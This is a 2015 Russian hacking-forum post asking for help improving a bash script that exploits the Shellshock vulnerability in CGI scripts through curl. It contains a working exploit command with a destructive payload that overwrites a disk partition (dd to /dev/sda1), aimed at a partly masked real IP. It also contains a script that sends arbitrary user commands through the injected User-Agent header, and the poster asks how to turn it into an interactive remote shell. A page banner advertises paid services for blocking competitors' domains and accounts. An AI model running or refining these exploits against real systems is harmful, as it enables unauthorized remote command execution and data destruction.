bash+curl+shellshock

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
bash+curl+shellshock

Опции темы

Поиск в этой теме

Опции просмотра

28.07.2015, 20:39

traceme

Познающий

Регистрация: 11.06.2015

Сообщений: 34

С нами: 5749526

Репутация: 1

Всем здравия!

Есть вопрос по приведению в порядок скрипта для использования уязвимости, может даже кто-то поделится своим)

Метасплоит не всегда бывает под рукой да и его установка не везде возможна, а башем можно пользоваться почти везде где если линукс.

Вот пример работы shellshock

Код:

curl -i --insecure https://**.181.32.92/cgi-bin/index.cgi -A "() { :;};echo;dd if=/dev/random of=/dev/sda1 bs=4k"

Вот "пример" скрипта

Код:

echo  "Enter URI to cgi"
read vuln_cgi
echo "Enter cmd"
read send_cmd
curl -i -A "() { :;};echo;$send_cmd" $vuln_cgi

Вопрос:

Как после ввода команды для выполнения через shellshock скрипт не завершался, а ждал ввода новой команды

Также хотелось бы сделать выход из скрипта, например если ввести "Q"

Также столкнулся с проблемой , когда при выполнении запроса через уязвимость, после выполнения команды выводится код самого cgi скрипта и получается очень неудобно читать нужную часть вывода.

Есть ли возможность выводить текст , но до появления, например, "DOCTYPE" чтобы отсечь шелуху.

𝕏 Twitter Reddit Telegram Копировать ссылку